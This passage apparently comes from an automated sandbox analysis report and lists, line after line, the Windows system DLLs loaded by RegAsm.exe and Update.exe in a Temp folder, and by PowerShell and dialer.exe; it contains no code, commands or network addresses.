            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: vcruntime140.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: libcrypto-3.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: textshaping.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: vcruntime140.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: libcrypto-3.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: textshaping.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\Update.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
